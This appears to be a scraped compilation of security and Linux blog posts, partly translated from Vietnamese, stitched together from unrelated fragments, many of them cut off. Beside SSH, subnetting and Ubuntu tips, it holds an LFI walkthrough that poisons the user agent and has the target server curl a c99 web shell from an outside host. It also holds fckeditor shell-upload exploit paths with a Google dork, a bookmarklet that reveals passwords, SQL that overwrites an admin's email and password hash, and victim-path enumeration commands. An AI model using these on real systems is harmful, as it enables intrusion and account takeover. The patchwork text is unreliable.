Top 20 OpenSSH Server Best Security Practices

OpenSSH is the implementation of the SSH protocol. OpenSSH is recommended for remote login, making backups, remote file transfer via scp or sftp, and much more. SSH is well suited to keeping confidentiality and integrity for data exchanged between two networks and systems. However, the main advantage is server authentication, through the use of public key cryptography. From time to time there are rumors about OpenSSH zero-day exploits. Here are a few things you need to tweak in order to improve OpenSSH server security.

Default Config Files and SSH Port

  • /etc/ssh/sshd_config - OpenSSH server configuration file.

  • /etc/ssh/ssh_config - OpenSSH client configuration file.

  • ~/.ssh/ - User's SSH configuration directory.

  • ~/.ssh/authorized_keys - Lists the public keys (RSA or DSA) that can be used to log into the user's account.

  • /etc/nologin - If this file exists, sshd refuses to let anyone except root log in.

  • /etc/hosts.allow and /etc/hosts.deny - Access control lists enforced by TCP wrappers are defined here.

  • SSH default port: TCP 22

[Win Tool] Boot Multiple ISO from USB (MultiBoot USB)

How to create a Multiboot USB Flash Drive that you can use to Boot Multiple ISO Files from USB. Please note that you might need an 8GB-16GB or larger USB flash device to be able to support every bootable ISO entry. I will update and add more Bootable ISO files to the list as I find the time to test them. You can also contact me to submit working Bootable Linux ISO menu.lst entries for inclusion.

MultiSystem - Create a MultiBoot USB from Linux

Custom Multiboot UFD containing your favorite Bootable Live Linux Distributions.

 

Official HomePage: http://liveusb.info/dotclear

Multisystem Prerequisites:


  • Ubuntu Linux or Ubuntu Based System (can use an Ubuntu CD or USB)

  • A USB Flash Drive (to use for your MultiBoot USB)

  • Working Internet Connection

  • install-depot-multiboot.sh.tar.bz2

Fast subnetting

A while ago I wrote the post "Subnet mask và cách chia" (Subnet masks and how to divide them), which covered basic subnetting. There are many ways to calculate and remember the subnetting method; this post presents a very fast one, for your reference. Via the blog of Lê Cường.

[Figures: left hand, right hand]


The steps are as follows:

We have the following lab:

For example, we have the network 192.168.1.0 and the boss wants it divided into 3 subnets:

Step 1: Determine the number of bits to borrow based on the number of subnets wanted (left-hand rule):

The formula for how many subnets we can create is:

2^n >= m (m is the number of subnets required, n is the number of bits we will borrow)

so we have 2^n >= 3 (3 is the number of subnets the boss asked for),

which gives n = 2. (On the left hand, the second joint of the little finger is 4, and 4 is of course greater than 3.)

Step 2: Right-hand rule: here we borrow 2 bits (the n from Step 1). According to the right-hand picture, this gives 192.

Step 3: Find the block size (the block size tells us which IP range each of these subnets spans).

Take 256 minus the 192 from Step 2 (where does 256 come from? 0 to 255 is 256 addresses), so 256 - 192 = 64.

==> We get the following subnets:

Subnet 1: 192.168.1.0      Netmask: 255.255.255.192
Subnet 2: 192.168.1.64     Netmask: 255.255.255.192
Subnet 3: 192.168.1.128    Netmask: 255.255.255.192
Subnet 4: 192.168.1.192    Netmask: 255.255.255.192

Done: we get 4 small subnets, use them as you like. Test it by installing Windows XP on 2 virtual machines and then assigning IPs according to the following 3 cases:

Case 1:

Machine 1: 192.168.1.70    Netmask: 255.255.255.192
Machine 2: 192.168.1.80    Netmask: 255.255.255.192

Result: ping between the two machines ==> ping OK. (Reply from 192.168.1.80: bytes=32 time=1ms TTL=128)

Case 2:

Machine 1: 192.168.1.70    Netmask: 255.255.255.192
Machine 2: 192.168.1.180   Netmask: 255.255.255.192

Result: ping between the two machines ==> ping fails (because these two IPs are on different subnets).

Case 3:

Machine 1: 192.168.1.62    Netmask: 255.255.255.192
Machine 2: 192.168.1.128   Netmask: 255.255.255.192

Result: Machine 1 cannot be assigned that IP, and neither can Machine 2.

Why is that? I'll leave the conclusion to you.

End of lab. After this lab you have the formula for calculating and dividing subnets. Next, try learning the fast calculation method below.

Subnet masks and how to divide them

What is a subnet? Simply put: when we divide a network into several smaller networks, these smaller networks are called subnets.

Why do we need to subnet?

Uploading shell by using LFI

================================
Required:
1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox...
================================

So... first you find some site vulnerable to LFI... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs

Now, on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our user agent (Mozilla, Netscape, etc.) and now we must spoof it... but how?

Open a new tab in Mozilla, and type "about:config" (without quotes)...

Now, in "Filter" type: general.useragent.extra.firefox

You will get something like this:


Code:

Preference name                            Status     Type        Value
general.useragent.extra.firefox default string Firefox/3.0.7


Now, double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:

<? include("http://shelladdress.com/c99.txt"); ?>


If everything is good you will get the shell included... Otherwise, you will get errors... Mostly I was getting the error "URL-File access disabled" or something like that... but using PHP I found another way...

Instead of typing

Code:

<? include("http://shelladdress.com/c99.txt"); ?>


as useragent,type this:

Code:

<? passthru($_GET['cmd']); ?>


Then load your vuln page like this:

Code:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php


So, let's review... basically, you are just adding the &cmd= thing at the end of the URL...

Now, using the "curl" command you will get the content of the shell in txt format and by using -o c99.php you will rename it to c99.php...

Now simply go to your site like this:

Code:

http://yourvulnsite.com/c99.php


And that's all...

Enjoy, if I helped you, hit the thanks button...

 

Code for chmod when the shell cannot chmod

Code:

<?php
@chmod("index.php", 0755);
?>

This code only works in the directory it is uploaded to.
Example:
If I want to chmod the file index.php in the (forum) directory,
then just upload that code to the forum directory and run that PHP file.

 

osCommerce Remote File Upload Vulnerability (/admin/categories.php)

# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
# Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]

Bypassing Linuxconf in Mandrake

If you have used Mandrake (or almost any Linux distribution) for any time you've become familiar with the great utility Linuxconf. Linuxconf is installed by default on a Mandrake system and can be used for a score of configuration related tasks. Check out the Linuxconf homepage for more details. You can usually find linuxconf in the /bin directory of your machine. If you don't have it, feel free to download the latest RPM from RPMfind.net or any one of the mirrors found at Mandrake Linux.

Hacking Windows shares from Linux with Samba



A little while ago I did an article on breaking into Windows shares using an automated madirish.bat. If you're not familiar with that article, feel free to read up on Madirish.net (articles Madirish Tutorial 09 and Tutorial 10 in the 'Tech' section). In that article I showed how to use native Windows diagnostic commands to browse around not only your local network, but also remote networks, to find open shares and access the resources in those shares. In this short piece I'll show you how to do the same thing from a Linux environment. The lynchpin to this operation is Samba, the Linux tool that allows Linux machines to play in Windows networks. If you don't have Samba installed, you're going to need it (the client tools only, the server isn't necessary). If you don't know how to install Samba head over to www.Samba.org. If you still can't figure out how to install Samba on your own computer you really don't have any business breaking into other people's computers :)

Connecting To a Remote MySQL Server Securely Using SSH Port Forwarding

Connecting Securely


Oftentimes utilizing a remote MySQL database is as simple as opening an SSH session to the remote machine, typing 'mysql -u username -p' and using the MySQL command line client. Sometimes, however, this can be cumbersome and you might wish to use a GUI based management tool. This becomes a problem if the remote database is behind a firewall that won't allow remote MySQL port connections (MySQL accepts connections on port 3306 by default) or if you're worried about your password being transmitted in clear text. This short article describes how to connect to a remote MySQL server securely. By default, MySQL clients issue passwords in clear text to the server (meaning if they are intercepted they aren't secured at all). In order to connect to a remote server you can use port forwarding. Using this method you can also bypass firewalls that allow remote SSH connections (i.e. open port 22), but block remote MySQL connections (i.e. closed or blocked port 3306).

Wireless Hacking with Kismet



The proliferation of wireless networks is sometimes scary when you consider how insecure most wireless configurations are. With a little work, and some technical know-how you can easily break into most wireless networks or simply monitor the wireless traffic flowing all around you. The good news is that setting up a wireless monitor takes a bit of persistence and isn't very feasible for the average computer user.

The easiest way to begin monitoring wireless network traffic is with kismet. Kismet is most easily installed on Linux, but be warned, it isn't all that easy. To begin you need to download Kismet from http://www.kismetwireless.net. You'll need to be sure you have gcc and make installed in order to compile the sources. On Mandriva you can install these using:

SSHatter SSH Brute Forcer



SSHatter is an SSH brute force utility available from http://freshmeat.net/projects/sshatter/?branch_id=70781&release_id=263196. Essentially the tool is comprised of a small Perl file. The utility requires a few non-standard Perl libraries but these are easily installed. You must have Perl installed to use SSHatter.

Installing SSHatter

Using Netcat to Transfer Files (and Other Mischief)

Netcat is an oft maligned program that can easily be used for many interesting and useful purposes. While many admins have heard of netcat, it is usually in the context of detecting rootkits or evidence of intrusion. The fact that netcat is a favorite tool among malicious hackers does a great disservice to the tool, but it also demonstrates its utility.

Web Hacking Lesson 6 - Arbitrary Code Execution Vulnerabilities

Arbitrary Code Execution Vulnerabilities


Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

This type of vulnerability is extremely dangerous. Unsafely written PHP that utilizes system calls and user input could allow an attacker to run an arbitrary command on the filesystem. This attack bears many resemblances to SQL injection in that the attacker manipulates input to cause execution of unintended commands. This vulnerability shows up in many forms, so utmost care should be used whenever using one of PHP's many filesystem call functions (such as system(), exec(), passthru(), shell_exec(), etc.)

Web Hacking Lesson 5 - File Upload Vulnerabilities

PHP File Upload Exploits


Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

File upload exploits are a common problem with web based applications. In a nutshell this vulnerability hinges on functionality that allows an attacker to upload a script file that can then be executed on the server. The most common cause of this vulnerability is functionality that is supposed to allow users to upload inert content (things like images, PDF documents and the like) that is designed to be displayed. Often, however, developers forget to accomplish proper input validation (are you noticing a theme here yet?) that doesn't restrict the types of files an attacker can upload.

Web Hacking Lesson 4 - File Include Vulnerabilities

PHP File Include Vulnerabilities


Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

Along the same lines as SQL injection and XSS, remote file inclusion vulnerabilities rely on the user being able to manipulate variables interpreted by PHP. The most common occurrence of this vulnerability is the use of URL strings to determine included files. The threat posed by this vulnerability is largely determined by the configuration of the PHP server. Some servers will allow more malicious includes than others.

Web Hacking Lesson 3 - Brute Force

Brute Forcing


Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

Brute forcing a web application is a method to bypass traditional authentication checks. Although brute forcing may seem like an attack that a PHP developer might not be able to mitigate, it is actually an important consideration when developing web applications.

Web Hacking Lesson 2 - SQL Injection

SQL Injection


Note: If you haven't read Lesson 1 go check it out first for test application install instructions.

SQL injection attacks bear many of the same fundamental hallmarks as XSS attacks. At its core, SQL injection abuses the web application to introduce unintended functionality. SQL injection aims to escape the confines of a developer-crafted SQL statement to alter the SQL. Take the following example:

Web Hacking Lesson 1

This exercise is designed to expose you to several of the top threat vectors facing web based applications, specifically PHP/MySQL applications. 'Threat vector' is a common term used in computer security to connote ways in which an attacker will attempt to compromise a system. System is used in a broad sense here because a compromised web application can easily lead to a compromised web server which in turn could lead to a compromised operating system.

Brute Forcing PHP MD5 Hashed Passwords


Web Application Passwords


Many PHP based web applications use md5 hashing in order to obscure stored passwords. At first glance this seems like an effective security measure; however, upon further examination it becomes clear that this approach does little to secure a password. Let us assume that an attacker somehow captures the md5 hash of a user's password. This could happen in many ways, the most obvious being a SQL injection that reveals the password.

MD5


Protecting Your LAMP Site with a Robots.txt Honeypot



One standard form of information discovery and reconnaissance used by malicious attackers is to scan a target website and search for robots.txt files. The robots.txt file is designed to provide instructions to spiders or web crawlers about a site's structure and more importantly to specify which pages and directories the spider should not crawl. Often these files are used to keep a spider from crawling sensitive areas of a website, such as administrative interfaces, so that search engines don't cache the existence of such pages and functionality. It is precisely for this reason that a malicious attacker will look in a robots.txt file - they often provide roadmaps to sensitive data and administrative interfaces.

Creating a Robots.txt Honeypot



One standard form of information discovery and reconnaissance used by malicious attackers is to scan a target website and search for robots.txt files. The robots.txt file is designed to provide instructions to spiders or web crawlers about a site's structure and more importantly to specify which pages and directories the spider should not crawl. Often these files are used to keep a spider from crawling sensitive areas of a website, such as administrative interfaces, so that search engines don't cache the existence of such pages and functionality. It is precisely for this reason that a malicious attacker will look in a robots.txt file - they often provide roadmaps to sensitive data and administrative interfaces.

Bypassing PHP PathInfo



The pathinfo() built-in PHP function is often used by programmers to identify the types of files being specified in URLs. Pathinfo will do simple parsing of path and filenames and present an array of useful attributes such as the base name of the file specified or the file extension of the file specified. The following example is provided from the PHP.net website:

<?php
$path_parts = pathinfo('/www/htdocs/index.html');

echo $path_parts['dirname'], "\n";
echo $path_parts['basename'], "\n";
echo $path_parts['extension'], "\n";
echo $path_parts['filename'], "\n"; // since PHP 5.2.0
?>

Hardening PHP from php.ini

PHP's default configuration file, php.ini (usually found in /etc/php.ini on most Linux systems), contains a host of functionality that can be used to help secure your web applications. Unfortunately many PHP users and administrators are unfamiliar with the various options that are available in php.ini and leave the file in its stock configuration. By utilizing a few of the security related options in the configuration file you can greatly strengthen the security posture of web applications running on your server.

Safe Mode


Acidcat CMS v 3.3 (fckeditor) Shell Upload Vulnerability

===[ Exploit ]===

[»] http://server/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/asp/connector.asp

[»] asp renamed via the .asp;.jpg (shell.asp;.jpg)

News Script PHP Pro (fckeditor) File Upload Vulnerability

===[ Exploit ]=== ./Iranian HackerZ

[»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html

[»] Select the "File Upload" To use = php

===[ Upload To ]===

[»] http://server/[patch]/userfiles/Name File

Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability

exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html

[!] first find the target host

ex: www.site.com or www.target.com/maximus

then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#

Metasploit user guide

1) Introduction

Metasploit Framework is an environment used for testing, attacking and exploiting vulnerabilities in services. Metasploit is built in the object-oriented language Perl, with components written in C, assembler, and Python. Metasploit can run on most operating systems: Linux, Windows, MacOS. You can download the program at www.metasploit.com

Metasploit can update itself automatically starting from version 2.2, using the msfupdate.bat script in the installation directory.

2) Components of Metasploit

View a Gmail password with JavaScript

Add a bookmark to the Firefox bookmark bar and put the following code in the Location field:

javascript:var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Xem mật khẩu', s)}else{alert('Mật khẩu trống')}return true;}}

Auto check the rules checkbox on vBB registration:

javascript:var%20x=document.getElementById('cb_rules_agree');x.checked='on';var%20y=document.getElementsByTagName('input');for%20(var%20i=0;i<y.length;i++){if%20(y[i].value=='Register'){y[i].click();}};

Auto fill birthday on vBB registration:

javascript:var%20x=document.getElementsByTagName('select');x[0].value='01';x%20%20[1].value='01';var%20y=document.getElementsByTagName('input');for%20(var%20i=0;i<y.length;i++){if%20(y[i].name=='year'){y[i].value=1980;}};

SQL update

update user set email="hehehe@yahoo.com" where id=1

update 'user' set 'email'='mail_cua_minh@yahoo.com' where 'username'='user_admin';

update 'table_can_update' set 'ten_pas_can_update'='pas_moi_de_update' where 'ID'='ID_admin';

update user set passwd ="e10adc3949ba59abbe56e057f20f883e" where id=1

Basic command skills

cat /etc/passwd | cut -f1 -d:

or:

cut -f1 -d: /etc/passwd

Another way to find the victim's path

Have you ever come across a site that is an addon domain?

Looking at /etc/passwd shows nothing.

Peeking at the error_log, it is 2-3 GB or so and freezes the whole machine.

Sharing a small trick with you:

find /usr/local/apache/logs/ -name 'error_log' | xargs grep -E 'victim.com'

Useful commands and tricks in Ubuntu

The tricks and commands below may be useful to you when using Ubuntu, both the Desktop and Server editions.
sudo: when sudo is placed in front of a command it invokes root privileges to execute that command, and when execution finishes it returns to the privileges of the user you are using.
sudo apt-get install package_name: apt-get install installs a software package; replace package_name with the name of the package you want to install. You put sudo in front of the command to request the installation privileges of the highest user, root, or to confirm it yourself if your user belongs to the root group.
Example: sudo apt-get install rar

Tricks for using rdesktop in Ubuntu

-0: Seems to be the same as mstsc /console

-D: No title bar

-g: set the resolution

-z: compression (runs faster)

-r <path>: automatically map a folder on the host machine as a network drive.

 

The best ways to open a Terminal (Guake Terminal)

Keyboard shortcut

In Ubuntu and Linux Mint, the default keyboard shortcut for the terminal is the combination Ctrl+Alt+T. If you want to change this shortcut so you can open the terminal your own way, go to Menu > System > Preferences > Keyboard Shortcuts.

Scroll down the window and find the shortcut for "Run a Terminal". If you want to change the setting, click on Run a terminal and set the new shortcut you want.

Right-click menu

Installing VirtualBox 4.0

Remove the old VirtualBox from the machine
Depending on the version you use, for example version 3.2:

sudo apt-get remove virtualbox-3.2

Add the VirtualBox repository and install:

Run the following commands to add the repository and install

Basic Ubuntu commands

Moving around / listing files

pwd displays the name of the current working directory

cd changes to the directory « /home/user »

cd ~/Desktop changes to the directory « /home/user/Desktop »

 